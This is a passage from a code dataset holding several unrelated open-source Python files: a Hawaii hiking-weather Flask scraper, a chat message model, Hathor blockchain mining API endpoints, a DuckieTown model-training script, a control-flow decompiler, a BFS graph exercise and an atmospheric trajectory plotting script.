High\"\nif indexnum > 10:\n explvl = \"Extreme\"\n\n################ 
Synopsis ################\n#\n# res = requests.get('https://forecast.weather.gov/product.php?issuedby=HFO&product=AFD&site=hfo')\n# res.raise_for_status()\n# bs4.BeautifulSoup(res.text, features='lxml')\n#\n# soup = bs4.BeautifulSoup(res.text, features='lxml')\n# soup.find('#localcontent > pre')\n#\n# syn1 = soup.select('#localcontent > pre')\n#\n# syn2 = syn1[0]\n# syn3 = str(syn2)\n# syn4 = syn3[0:-1]\n#\n# syn5 = syn4.index('SYNOPSIS')\n# syn6 = syn4.index('DISCUSSION')\n#\n# syn7 = int(syn5 + 11)\n# syn8 = int(syn6 - 14)\n#\n# syn = syn3[syn7:syn8]\n\n################ WWA's ################\n\nres = requests.get('https://www.weather.gov/wwamap/wwatxtget.php?cwa=hfo&wwa=all')\nres.raise_for_status()\nbs4.BeautifulSoup(res.text, features='lxml')\n\nsoup = bs4.BeautifulSoup(res.text, features='lxml')\nheadlines = soup.find_all('h3')\ndef sort_wwas():\n try:\n h0 = headlines[0].contents[0]\n except IndexError:\n h0 = \"None\"\n try:\n h1 = headlines[1].contents[0]\n except IndexError:\n h1 = \"\"\n try:\n h2 = headlines[2].contents[0]\n except IndexError:\n h2 = \"\"\n try:\n h3 = headlines[3].contents[0]\n except IndexError:\n h3 = \"\"\n try:\n h4 = headlines[4].contents[0]\n except IndexError:\n h4 = \"\"\n\n return(h0, h1, h2, h3, h4)\n\nh0 = sort_wwas()[0]\nh1 = sort_wwas()[1]\nh2 = sort_wwas()[2]\nh3 = sort_wwas()[3]\nh4 = sort_wwas()[4]\n\n#\n# res = requests.get('https://alerts.weather.gov/cap/hi.php?x=1')\n# res.raise_for_status()\n# bs4.BeautifulSoup(res.text, features='lxml')\n#\n# soup = bs4.BeautifulSoup(res.text, features='lxml')\n# soup.find('body')\n#\n# syn1 = soup.select('body')\n#\n# syn2 = syn1[0]\n# syn3 = str(syn2)\n# syn4 = syn3[0:-1]\n#\n# syn5 = syn4.index('')\n# syn6 = syn4.index('')\n#\n# syn7 = int(syn5 + 9)\n# syn8 = int(syn6)\n#\n# wwa = syn3[syn7:syn8]\n\n #Old code\n\n#syn10 = syn4.index('HFO WATCHES/WARNINGS/ADVISORIES')\n#syn11 = syn4.index('$$')\n\n#syn12 = int(syn10 + 34)\n#syn13 = int(syn11 - 13)\n\n#wwa = syn3[syn12:syn13]\n\n################ Hazards ################\n#\n# res = requests.get('https://forecast.weather.gov/product.php?site=NWS&issuedby=HFO&product=HWO')\n# res.raise_for_status()\n# bs4.BeautifulSoup(res.text, features='lxml')\n#\n# soup = bs4.BeautifulSoup(res.text, features='lxml')\n# soup.find('#local > div:nth-child(3) > span')\n#\n# hzd_sel = soup.select('#local > div:nth-child(3) > span')\n# hzds = str(hzd_sel[0].text).strip()\n\n######################### All Island Forecast\n\nres = requests.get('https://forecast.weather.gov/product.php?issuedby=HFO&product=SFP&site=hfo')\nres.raise_for_status()\nbs4.BeautifulSoup(res.text, features='lxml')\n\nsoup = bs4.BeautifulSoup(res.text, features='lxml')\nsoup.find('#localcontent > pre')\n\nfcst1 = soup.select('#localcontent > pre')\n\nfcst2 = fcst1[0]\nfcst3 = str(fcst2)\nfcst4 = fcst3[0:-1]\n\nkomml = fcst4.find('KAUAI-OAHU-MAUI-MOLOKAI-LANAI-')\nbig_i = fcst4.find('BIG ISLAND OF HAWAII-')\nend = fcst4.find('$$')\n\nkomml_int = int(komml)\nbig_i_int = int(big_i)\nend_int = int(end)\n\nkomml_sect = fcst3[komml_int:big_i_int].strip()\nbig_i_sect = fcst3[big_i_int:-1].strip()\n\nsect1_index1 = komml_sect.index('TO')\nsect1_index2 = komml_sect.index('MPH')\n\nsect1_int1 = int(sect1_index1)\nsect1_int2 = int(sect1_index2 + 4)\n\nkomml_fcst = komml_sect[sect1_int1:sect1_int2].title()\n\nsect2_index1 = big_i_sect.index('TO')\nsect2_index2 = big_i_sect.index('MPH')\n\nsect2_int1 = int(sect2_index1)\nsect2_int2 = int(sect2_index2 + 4)\n\nbig_i_fcst = 
big_i_sect[sect2_int1:sect2_int2].title()\n\n\n\n#########################\n\nhome = Blueprint('home', __name__)\n\n@home.route(\"/\")\n@home.route(\"/home\")\ndef homeinfo():\n info = \"Hikeit Hawaii\"\n statement = \"Hawaii Hiking Conditions\"\n summary = \"Hawaii's Hiking Weather...Trail Conditions...and Waterfalls\"\n island = \"Hawaiian Islands\"\n general_title = \"Forecast: Hawaiian Islands\"\n\n dawn = hnl_dawn\n sunrise = hnl_sr\n sunset = hnl_ss\n dusk = hnl_dusk\n moon_phase = moon\n\n all_island_fcst = komml_fcst\n big_island_fcst = big_i_fcst\n\n # synopsistitle = \"Synopsis\"\n # synopsis = syn\n\n wwa_title = \"NWS Hazards\"\n #hazards = hzds\n wwa0 = h0\n wwa1 = h1\n wwa2 = h2\n wwa3 = h3\n wwa4 = h4\n\n time = curr_time\n\n uvexposure = \"UV Exposure\"\n uvi = 'UV Index:' + indexnumstring + ' | ' + explvl\n\n return render_template('homev2.html',**locals())\n","repo_name":"richsuds/hikeithawaii","sub_path":"homepage.py","file_name":"homepage.py","file_ext":"py","file_size_in_byte":8228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"71072421935","text":"\"\"\"\n Model class for chat messages\n\"\"\"\nfrom pydantic import BaseModel\n\n\nclass ChatMessage(BaseModel):\n '''\n Chat message dataclass\n '''\n message_id: str\n user_id: str\n message: str\n room_id: str\n\n def to_dict(self) -> dict:\n '''\n Converts the dataclass to a dictionary\n '''\n return {\n 'message_id': self.message_id,\n 'message': self.message,\n 'user_id': self.user_id,\n 'room_id': self.room_id\n }\n","repo_name":"Abderraouf99/medium-article-source-code","sub_path":"flash-chat/part2/server/src/models/chat_message.py","file_name":"chat_message.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"56"} +{"seq_id":"27673013263","text":"import enum\n\nfrom structlog import get_logger\n\nfrom hathor.api_util import Resource, get_args, set_cors\nfrom hathor.cli.openapi_files.register import register_resource\nfrom hathor.crypto.util import decode_address\nfrom hathor.exception import HathorError\nfrom hathor.transaction.base_transaction import tx_or_block_from_bytes\nfrom hathor.util import api_catch_exceptions, json_dumpb, json_loadb\n\nlogger = get_logger()\n\n\nclass APIError(HathorError):\n \"\"\"Used for aborting and returning an error with optional status code.\"\"\"\n status_code: int\n\n def __init__(self, msg, status_code=400):\n super().__init__(msg)\n self.status_code = status_code\n\n\nclass Capabilities(enum.Enum):\n MERGED_MINING = 'mergedmining'\n\n\n@register_resource\nclass GetBlockTemplateResource(Resource):\n \"\"\" Resource for generating a Block template for mining.\n\n You must run with option `--status `.\n \"\"\"\n isLeaf = True\n\n def __init__(self, manager):\n # Important to have the manager so we can know the tx_storage\n self.manager = manager\n self.log = logger.new()\n\n @api_catch_exceptions\n def render_GET(self, request):\n \"\"\" GET request for /get_block_template/\n \"\"\"\n request.setHeader(b'content-type', b'application/json; charset=utf-8')\n set_cors(request, 'GET')\n\n # params\n raw_args = get_args(request)\n raw_address = raw_args.get(b'address')\n if raw_address:\n address = decode_address(raw_address[0].decode())\n else:\n address = b''\n caps = set(map(lambda s: Capabilities(s.decode()), raw_args.get(b'capabilities', [])))\n merged_mining = Capabilities.MERGED_MINING in caps\n\n if not 
self.manager.can_start_mining():\n self.log.debug('cannot generate Block Template, node syncing')\n # XXX: HTTP 503 Service Unavailable is suitable for temporary server errors\n raise APIError('Node syncing', 503)\n\n # get block\n # XXX: miner can edit block data and output_script, so it's fine if address is None\n block = self.manager.generate_mining_block(address=address, merge_mined=merged_mining)\n\n # serialize\n data = block.to_json(include_metadata=True)\n data.pop('hash')\n data.pop('inputs')\n data.pop('nonce', None)\n data.pop('aux_pow', None)\n\n return json_dumpb(data)\n\n\n@register_resource\nclass SubmitBlockResource(Resource):\n \"\"\" Resource for submitting a block mined from a template.\n\n Although there isn't any requirement that the mined block is generated from the get_block_template, there may be in\n the future. Furthermore there is always a chance that this node doesn't yet have the parent txs if the template was\n generated elsewhere. The only risk is missing the chance to propagate a block that could have been valid.\n\n You must run with option `--status `.\n \"\"\"\n isLeaf = True\n\n def __init__(self, manager):\n # Important to have the manager so we can know the tx_storage\n self.manager = manager\n self.log = logger.new()\n\n @api_catch_exceptions\n def render_POST(self, request):\n \"\"\" POST request for /submit_block/\n \"\"\"\n request.setHeader(b'content-type', b'application/json; charset=utf-8')\n set_cors(request, 'GET')\n\n data = json_loadb(request.content.read())\n\n tx = tx_or_block_from_bytes(bytes.fromhex(data['hexdata']), storage=self.manager.tx_storage)\n\n if not tx.is_block:\n self.log.debug('expected Block, received Transaction', data=data)\n raise APIError('Not a block')\n\n if not self.manager.can_start_mining():\n self.log.debug('cannot propagate Block, node syncing', data=data)\n raise APIError('Node syncing')\n\n res = self.manager.submit_block(tx)\n\n return json_dumpb({'result': res})\n\n\nGetBlockTemplateResource.openapi = {\n '/get_block_template': {\n 'x-visibility': 'public',\n 'x-rate-limit': {\n 'global': [\n {\n 'rate': '50r/s',\n }\n ],\n 'per-ip': [\n {\n 'rate': '1r/s',\n 'burst': 1,\n 'delay': 3,\n }\n ]\n },\n 'get': {\n 'tags': ['mining'],\n 'operationId': 'get_block_template',\n 'summary': 'EXPERIMENTAL: Get parameters for a miner, pool or proxy, to build mining block.',\n 'parameters': [\n {\n 'name': 'capabilities',\n 'in': 'query',\n 'description': 'Requested capabilities when generating a block template',\n 'schema': {\n 'type': 'array',\n 'items': {\n 'type': 'string',\n 'enum': [i.value for i in Capabilities]\n }\n }\n }\n ],\n 'responses': {\n '200': {\n 'description': 'Success',\n 'content': {\n 'application/json': {\n 'schema': {\n 'type': 'object',\n 'properties': {\n 'timestamp': {\n 'type': 'integer',\n },\n 'version': {\n 'type': 'integer',\n },\n 'weight': {\n 'type': 'number',\n },\n 'parents': {\n 'type': 'array',\n 'items': {\n 'type': 'string',\n }\n },\n 'outputs': {\n 'type': 'array',\n 'items': {\n 'type': 'object',\n 'properties': {\n 'value': {\n 'type': 'integer',\n },\n 'token_data': {\n 'type': 'integer',\n },\n 'script': {\n 'type': 'string',\n },\n }\n }\n },\n }\n }\n }\n }\n }\n }\n }\n }\n}\n\n\nSubmitBlockResource.openapi = {\n '/submit_block': {\n 'x-visibility': 'public',\n 'x-rate-limit': {\n 'global': [\n {\n 'rate': '50r/s',\n 'burst': 10,\n 'delay': 0,\n }\n ],\n 'per-ip': [\n {\n 'rate': '5r/s',\n 'burst': 1,\n 'delay': 0,\n }\n ]\n },\n 'post': {\n 'tags': ['mining'],\n 
'operationId': 'submit_block',\n 'summary': 'EXPERIMENTAL: Called by a miner to submit a block they found',\n 'requestBody': {\n 'description': 'Data to be propagated',\n 'required': True,\n 'content': {\n 'application/json': {\n 'schema': {\n 'type': 'object',\n 'properties': {\n 'hexdata': {\n 'type': 'string'\n }\n }\n }\n }\n }\n },\n 'responses': {\n '200': {\n 'description': 'Success',\n 'content': {\n 'application/json': {\n 'schema': {\n 'type': 'object',\n 'properties': {\n 'result': {\n 'type': 'bool'\n }\n }\n }\n }\n }\n }\n }\n }\n }\n}\n","repo_name":"HathorNetwork/hathor-core","sub_path":"hathor/transaction/resources/mining.py","file_name":"mining.py","file_ext":"py","file_size_in_byte":9072,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"56"} +{"seq_id":"72424792814","text":"import argparse\nimport logging\nimport os\nimport time\nfrom datetime import datetime\n\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\n\nfrom my_model import MyModel,NewModel\nfrom log_reader import Reader\n\nMODEL_NAME = \"MyModel\"\nlogging.basicConfig(level=logging.INFO)\n\n\n#! Default Configuration\nEPOCHS = 10000\nINIT_LR = 1e-3\nBATCH_SIZE = 16\nTRAIN_PERCENT = 0.8\nLOG_FILE = \"extended_dataset.log\"\nMODELTYPE=1\n\nEXPERIMENTAL = False\nOLD_DATASET = False\nSTEPS=4\n\nimport os\nfrom tensorflow.python.client import device_lib\n\nos.environ['CUDA_VISIBLE_DEVICES'] = \"0\"\nprint(device_lib.list_local_devices())\nprint(\"Num GPUs Available: \", len(tf.config.list_physical_devices('GPU')))\n\n\nclass DuckieTrainer:\n def __init__(\n self,\n epochs,\n init_lr,\n batch_size,\n log_dir, \n model_name,\n log_file,\n split,\n modeltype,\n window,\n ):\n self.modeltype=modeltype\n self.window=window\n self.model_name = model_name\n print(\"Observed TF Version: \", tf.__version__)\n print(\"Observed Numpy Version: \", np.__version__)\n\n self.create_dir()\n\n try:\n self.observation, self.linear, self.angular = self.get_data(log_file)\n except Exception:\n try:\n self.observation, self.linear, self.angular = self.get_data(log_file)\n except Exception:\n logging.error(\"Loading dataset failed... exiting...\")\n exit(1)\n logging.info(f\"Loading Datafile completed\")\n\n # 2. Split training and testing\n (\n observation_train,\n observation_valid,\n linear_train,\n linear_valid,\n angular_train,\n angular_valid,\n ) = train_test_split(self.observation, self.linear, self.angular, test_size=1 - split, shuffle=True)\n\n model = self.configure_model(learning_rate=init_lr, epochs=epochs)\n\n callbacks_list = self.configure_callbacks()\n\n # 11. GO!\n history = model.fit(\n x=observation_train,\n y={\"Linear\": linear_train, \"Angular\": angular_train},\n validation_data=(\n observation_valid,\n {\"Linear\": linear_valid, \"Angular\": angular_valid},\n ),\n epochs=epochs,\n callbacks=callbacks_list,\n shuffle=True,\n batch_size=batch_size,\n verbose=0,\n )\n\n model.save(f\"trainedModel/{self.model_name}.h5\")\n\n def create_dir(self):\n try:\n os.makedirs(\"trainedModel\")\n except FileExistsError:\n print(\"Directory already exists!\")\n except OSError:\n print(\"Create folder for trained model failed. 
Please check system permissions.\")\n exit()\n\n def configure_model(self, learning_rate, epochs):\n losses = {\"Linear\": \"mse\", \"Angular\": \"mse\"}\n lossWeights = {\"Linear\": 2, \"Angular\": 10}\n if self.modeltype==0:\n model = MyModel.build(200, 150)\n if self.modeltype==1:\n model = NewModel.build(self.window, 200, 150)\n opt = tf.keras.optimizers.Adam(learning_rate=learning_rate)\n model.compile(optimizer=opt, loss=losses, loss_weights=lossWeights, metrics=\"mse\")\n return model\n\n def configure_callbacks(self):\n tensorboard = tf.keras.callbacks.TensorBoard(\n log_dir=\"trainlogs/{}\".format(f'{self.model_name}-{datetime.now().strftime(\"%Y-%m-%d@%H-%M-%S\")}')\n )\n\n filepath1 = f\"trainedModel/{self.model_name}Best_Validation.h5\"\n checkpoint1 = tf.keras.callbacks.ModelCheckpoint(\n filepath1, monitor=\"val_loss\", verbose=1, save_best_only=True, mode=\"min\"\n )\n\n # ? Keep track of the best loss model\n filepath2 = f\"trainedModel/{self.model_name}Best_Loss.h5\"\n checkpoint2 = tf.keras.callbacks.ModelCheckpoint(\n filepath2, monitor=\"loss\", verbose=1, save_best_only=True, mode=\"min\"\n )\n\n return [checkpoint1, checkpoint2, tensorboard]\n\n def get_data(self, file_path, old_dataset=False):\n \"\"\"\n Returns (observation: np.array, linear: np.array, angular: np.array)\n \"\"\"\n reader = Reader(file_path)\n\n observation, linear, angular = reader.read() if old_dataset else reader.modern_read()\n\n if self.modeltype==1 :\n ########Data transformation###################\n observation = [ observation[x:x+self.window] for x in range(0,int(len(observation)/self.window)) ]\n print(1)\n linear = [ linear[x:x+self.window] for x in range(0,int(len(linear)/self.window)) ]\n print(2)\n angular = [ angular[x:x+self.window] for x in range(0,int(len(angular)/self.window)) ]\n print(3)\n\n print(np.array(observation).shape)\n print(np.array(linear).shape)\n print(np.array(angular).shape)\n ############# Datatransformation ###############\n\n logging.info(\n f\"\"\"Observation Length: {len(observation)}\n Linear Length: {len(linear)}\n Angular Length: {len(angular)}\"\"\"\n )\n return (np.array(observation), np.array(linear), np.array(angular))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Training Parameter Setup\")\n parser.add_argument(\"--epochs\", help=\"Set the total training epochs\", default=EPOCHS)\n parser.add_argument(\"--learning_rate\", help=\"Set the initial learning rate\", default=INIT_LR)\n parser.add_argument(\"--batch_size\", help=\"Set the batch size\", default=BATCH_SIZE)\n parser.add_argument(\"--log_dir\", help=\"Set the training log directory\", default=\"\")\n parser.add_argument(\"--log_file\", help=\"Set the training log file name\", default=LOG_FILE)\n parser.add_argument(\"--model_name\", help=\"Set the training log file name\", default=MODEL_NAME)\n parser.add_argument(\"--modeltype\", help=\"Set modeltype\", default=MODELTYPE)\n parser.add_argument(\"--window\", help=\"Set windowsize in case of LSTM\", default=STEPS)\n parser.add_argument(\n \"--split\",\n help=\"Set the training and test split point (input the percentage of training)\",\n default=TRAIN_PERCENT,\n )\n\n args = parser.parse_args()\n\n \n\n DuckieTrainer(\n epochs=int(args.epochs),\n init_lr=float(args.learning_rate),\n batch_size=int(args.batch_size),\n log_dir=args.log_dir,\n log_file=args.log_file,\n model_name = args.model_name,\n split=float(args.split),\n modeltype=int(args.modeltype),\n window=int(args.window)\n 
)\n","repo_name":"fdominik98/DSD-DuckieTown","sub_path":"training/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"771969480","text":"from itertools import groupby\nimport insn\n\ndef till(asm, end, brk=None, hasaddr=True):\n\tbody = []\n\taddr = None\n\twhile asm[0].pos != end:\n\t\ta, asm = parse(asm, brk=brk)\n\t\tif not asm:\n\t\t\traise ValueError(f\"Did not find {int(end)}\")\n\n\t\tif hasaddr and a.name == \"GOTO\" and asm[0].pos == end:\n\t\t\t(addr,) = a.args\n\t\telse:\n\t\t\tbody.append(a)\n\treturn body, addr, asm\n\ndef parse(asm, brk=None):\n\tif asm[0].name == \"GOTO\" and asm[0].args[0] == brk:\n\t\treturn insn.Insn(\"BREAK\"), asm[1:]\n\n\tif asm[0].name == \"IF\":\n\t\thead = asm[0]\n\t\tbody, addr, asm_ = till(asm[1:], head.args[1], brk=head.args[1])\n\t\tif addr == head.pos:\n\t\t\treturn insn.Insn(\"WHILE\", head.args[0], body), asm_\n\n\t\tiftrue, addr, asm_ = till(asm[1:], head.args[1], brk=brk)\n\t\tcases = [(head.args[0], iftrue)]\n\t\tif addr is not None:\n\t\t\tiffalse, _, asm_ = till(asm_, addr, brk=brk, hasaddr=False)\n\t\t\tif len(iffalse) == 1 and iffalse[0].name == \"IF\":\n\t\t\t\tcases.extend(iffalse[0].args[0])\n\t\t\telse:\n\t\t\t\tcases.append((None, iffalse))\n\n\t\treturn insn.Insn(\"IF\", cases), asm_\n\n\tif asm[0].name == \"SWITCH\":\n\t\thead = asm[0]\n\t\tasm_ = asm[1:]\n\t\tgroups = groupby(sorted(head.args[1] + [(None, head.args[2])], key=lambda a: a[1]), key=lambda a: a[1])\n\t\tgroups = [(a, tuple(b for b, _ in b)) for a, b in groups]\n\t\tassert len(groups) >= 2\n\n\t\t_, endpos, _ = till(asm_, groups[1][0])\n\t\tif endpos is None:\n\t\t\tassert groups[-1][1] == (None,)\n\t\t\tendpos = groups[-1][0]\n\t\t\t_, endpos2, _ = till(asm_, groups[-1][0])\n\t\t\tif endpos2 is not None:\n\t\t\t\tendpos = endpos2\n\t\t\telse:\n\t\t\t\tgroups.pop()\n\n\t\tcases = {}\n\t\tends = [addr for addr, _ in groups[1:]] + [endpos]\n\t\tfor (addr, k), end in zip(groups, ends):\n\t\t\tfor k_ in k[:-1]:\n\t\t\t\tcases[k_] = []\n\t\t\tcases[k[-1]], _, asm_ = till(asm_, end, brk=endpos, hasaddr=False)\n\t\treturn insn.Insn(\"SWITCH\", head.args[0], cases), asm_\n\n\treturn asm[0], asm[1:]\n\nclass Decompiled(list):\n\traw: list\n\ndef decompile(asm):\n\to = Decompiled()\n\to.raw = asm\n\twhile asm:\n\t\ta, asm = parse(asm)\n\t\to.append(a)\n\treturn o\n\ndef compile(expr, label, brk=None):\n\tfor op in expr:\n\t\tif op.name == \"BREAK\":\n\t\t\tyield insn.Insn(\"GOTO\", brk)\n\n\t\telif op.name == \"IF\":\n\t\t\tend = label()\n\t\t\thas_else = False\n\t\t\tfor cond, body in op.args[0]:\n\t\t\t\tif has_else:\n\t\t\t\t\traise ValueError(\"invalid else\", op)\n\t\t\t\tif cond is None:\n\t\t\t\t\thas_else = True\n\t\t\t\t\tyield from compile(body, label, brk)\n\t\t\t\telse:\n\t\t\t\t\tl = label()\n\t\t\t\t\tyield insn.Insn(\"IF\", cond, l)\n\t\t\t\t\tyield from compile(body, label, brk)\n\t\t\t\t\tyield insn.Insn(\"GOTO\", end)\n\t\t\t\t\tyield l\n\t\t\tyield end\n\n\t\telif op.name == \"WHILE\":\n\t\t\tl = label()\n\t\t\tend = label()\n\t\t\tyield l\n\t\t\tyield insn.Insn(\"IF\", op.args[0], end)\n\t\t\tyield from compile(op.args[1], label, end)\n\t\t\tyield insn.Insn(\"GOTO\", l)\n\t\t\tyield end\n\n\t\telif op.name == \"SWITCH\":\n\t\t\tend = label()\n\t\t\tlabels = [label() for _ in op.args[1]]\n\t\t\tyield insn.Insn(\n\t\t\t\t\"SWITCH\",\n\t\t\t\top.args[0],\n\t\t\t\t[(k, l) for k, l in zip(op.args[1], labels) if k is not 
None],\n\t\t\t\tlabels[-1] if None in op.args[1] else end\n\t\t\t)\n\t\t\tfor l, code in zip(labels, op.args[1].values()):\n\t\t\t\tyield l\n\t\t\t\tyield from compile(code, label, end)\n\t\t\tyield end\n\n\t\telse:\n\t\t\tyield op\n","repo_name":"Kyuuhachi/Inevitable-Zero","sub_path":"decompile.py","file_name":"decompile.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"56"} +{"seq_id":"73398918894","text":"'''\nCode : BFS Traversal\n\nGiven an undirected and disconnected graph G(V, E), print its BFS traversal.\n\nNote:\n1. Here you need to consider that you need to print BFS path starting from vertex 0 only. \n2. V is the number of vertices present in graph G and vertices are numbered from 0 to V-1. \n3. E is the number of edges present in graph G.\n4. Take graph input in the adjacency matrix.\n5. Handle for Disconnected Graphs as well\n\nInput Format :\nThe first line of input contains two integers, that denote the value of V and E.\nEach of the following E lines contains space separated two integers, that denote that there exists an edge between vertex a and b.\n\nOutput Format :\nPrint the BFS Traversal, as described in the task.\n\nConstraints :\n0 <= V <= 1000\n0 <= E <= (V * (V - 1)) / 2\n0 <= a <= V - 1\n0 <= b <= V - 1\n\nTime Limit: 1 second\n\nSample Input 1:\n4 4\n0 1\n0 3\n1 2\n2 3\n\nSample Output 1:\n0 1 3 2\n'''\n\nimport queue\nfrom sys import stdin\n\nclass Graph :\n def __init__ (self,nVertices):\n self.nVertices = nVertices\n self.adjMatrix = [[ 0 for i in range(nVertices)] for j in range(nVertices)]\n def addEdge (self,v1,v2):\n self.adjMatrix[v1][v2] = 1\n self.adjMatrix[v2][v1] = 1\n def __bfs (self, sv, visited):\n q = queue. Queue()\n q.put(sv)\n visited[sv] = True\n while q.empty() is False :\n u = q.get()\n print(u, end= \" \" )\n for i in range(self.nVertices) :\n if self.adjMatrix[u][i] > 0 and visited[i] is False :\n q.put(i)\n visited[i] = True\n def bfs (self):\n visited = [ False for i in range(self.nVertices)]\n for i in range(self.nVertices):\n if visited[i] is False :\n self.__bfs(i, visited)\n\n#main\nv, e = input().strip().split(' ')\nv = int(v)\ne = int(e)\ng = Graph(v)\nif v != 0 and e != 0:\n for i in range(e):\n li = stdin.readline().rstrip().split(\" \")\n x = int(li[0])\n y = int(li[1])\n g.addEdge(x, y)\n g.bfs()\nelif v != 0 and e == 0:\n for i in range(v):\n print(i, end=' ')","repo_name":"jarvis-1805/DSAwithPYTHON","sub_path":"Graphs/Graphs/BFS_Traversal.py","file_name":"BFS_Traversal.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"56"} +{"seq_id":"38503628391","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Feb 8 23:26:52 2017\r\n\r\n@author: Bernard Legras\r\n\"\"\"\r\nimport numpy as np\r\nimport pickle, gzip\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.colors as colors\r\nfrom mpl_toolkits.basemap import Basemap\r\nimport deepdish as dd\r\nimport socket\r\nfrom os.path import join\r\n# flags\r\nI_DEAD = 0x200000\r\nI_HIT = 0x400000\r\nI_OLD = 0x800000\r\nI_CROSSED = 0x2000000\r\nI_DBORNE = 0x1000000\r\n\r\n# color list with 20 colors\r\n\r\nlistcolors=['#161d58','#253494','#2850a6','#2c7fb8','#379abe','#41b6c4',\r\n '#71c8bc','#a1dab4','#d0ecc0','#ffffcc','#fef0d9','#fedeb1',\r\n '#fdcc8a','#fdac72','#fc8d59','#ef6b41','#e34a33','#cb251a',\r\n '#b30000','#7f0000']\r\nmymap=colors.ListedColormap(listcolors)\r\n\r\n# %%\r\n\"\"\" Defines 
the domain\r\n\"\"\"\r\ndomain=np.array([[-179.,181.],[-30.,50.]])\r\nbinx = 360; biny = 80\r\n\r\ndeltay = (domain[1,1]-domain[1,0])/biny\r\ndeltax = (domain[0,1]-domain[0,0])/binx\r\nycent = np.arange(domain[1,0] + 0.5*deltay,domain[1,1],deltay)\r\nxcent = np.arange(domain[0,0] + 0.5*deltax,domain[0,1],deltax)\r\nyedge = np.arange(domain[1,0],domain[1,1]+0.1*deltay,deltay)\r\nxedge = np.arange(domain[0,0],domain[0,1]+0.1*deltax,deltax)\r\n# Generate the grid of points\r\nxg = np.tile(xcent,(biny,1))\r\nyg = np.tile(ycent,(binx,1)).T\r\n# Size of the grid\r\nbloc_size = binx * biny\r\nxg = np.reshape(xg,bloc_size)\r\nyg = np.reshape(yg,bloc_size)\r\n\r\nif socket.gethostname() == 'Graphium':\r\n BACK_DIR = 'C:\\\\cygwin64\\\\home\\\\berna\\\\data\\\\STC\\\\STC-BACK-OUT-SAF-OPAQ'\r\nelif socket.gethostname() == 'grapelli':\r\n BACK_DIR = '/limbo/data/STC/STC-BACK-OUT-SAF-OPAQ'\r\nelif socket.gethostname() in ['couperin','zappa','coltrane','puccini']:\r\n BACK_DIR = '/net/grapelli/limbo/data/STC/STC-BACK-OUT-SAF-OPAQ'\r\nelif socket.gethostname() == 'gort':\r\n BACK_DIR = '/dkol/data/STC/STC-BACK-OUT-SAF-OPAQ'\r\n\r\ndef main():\r\n # load the big file containing ended \r\n theta=400\r\n fname1 = join(BACK_DIR,'BACK-EIZ-FULL-Jul-2017-'+str(theta)+'K.hdf5z')\r\n fname2 = join(BACK_DIR,'BACK-EIZ-FULL-Aug-2017-'+str(theta)+'K.hdf5z')\r\n\r\n h_hits_m = {}\r\n h_dborne_m = {}\r\n h_old_m = {}\r\n h_dead_m = {}\r\n H_m = {}\r\n \r\n i=0\r\n for fname in [fname1,fname2]: \r\n ended = dd.io.load(fname)\r\n \r\n # number of parcels launched per bin\r\n bin_size = int(len(ended['src']['x'])/bloc_size)\r\n # percentage of parcels hiting a cloud\r\n j_hits = np.where(ended['flag_source'] & I_HIT == I_HIT)[0] % bloc_size\r\n h_hits_m[i] = 100*np.histogram(j_hits,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0]/bin_size\r\n del(j_hits)\r\n # percentage of deadborne parcels\r\n # j_dborne = np.where(ended['flag_source'] & I_DBORNE == I_DBORNE)[0] % bloc_size\r\n # h_dborne = 100*np.histogram(j_dborne,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0]/bin_size\r\n # del(j_dborne)\r\n # percentage of parcels ending as too old\r\n j_old = np.where(ended['flag_source'] & I_OLD == I_OLD)[0] % bloc_size\r\n h_old_m[i] = 100*np.histogram(j_old,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0]/bin_size\r\n del(j_old)\r\n # percentage of parcels ending by crossing the edges\r\n j_dead = np.where(ended['flag_source'] & I_CROSSED == I_CROSSED)[0] % bloc_size\r\n h_dead_m[i] = 100*np.histogram(j_dead,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0]/bin_size\r\n del(j_dead)\r\n x_hits = ended['src']['x'][ended['flag_source'] & I_HIT == I_HIT]\r\n y_hits = ended['src']['y'][ended['flag_source'] & I_HIT == I_HIT]\r\n H_m[i]=np.histogram2d(y_hits,x_hits,bins=[biny,binx],range=domain[::-1])[0]\r\n i += 1\r\n \r\n h_hits = 0.5*(h_hits_m[0] + h_hits_m[1])\r\n #h_dborne = 0.5*(h_dborne_m[0] + h_dborne_m[1])\r\n h_old = 0.5*(h_old_m[0] + h_old_m[1])\r\n h_dead = 0.5*(h_dead_m[0] + h_dead_m[1])\r\n # percentage of still alive parcels\r\n #j_alive = np.where(ended['flag_source'] == 0)[0] % bloc_size\r\n #h_alive = 100*np.histogram(j_alive,bins=bloc_size,range=(-0.5,bloc_size-0.5))[0]/bin_size\r\n #del(j_alive)\r\n # %%\r\n # plot of the statistics\r\n chart(np.reshape(h_hits,[biny,binx]),vmin=0,vmax=100,txt=\"Percentage of convective hits from EIZ FULL \"+str(theta)+\" K Jul-Aug 2017\",\r\n fgp='EIZ-FULL-percentage-hits-'+str(theta)+'K')\r\n #chart(np.reshape(h_dborne,[biny,binx]),txt=\"percentage of deadborne\")\r\n 
